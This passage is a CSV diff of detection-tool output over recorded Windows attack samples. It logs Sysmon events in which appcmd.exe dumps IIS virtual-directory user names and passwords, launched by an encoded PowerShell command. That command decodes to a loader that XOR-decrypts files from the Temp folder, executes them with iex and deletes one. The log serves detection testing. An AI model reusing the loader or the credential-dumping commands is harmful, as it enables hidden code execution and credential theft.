JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkA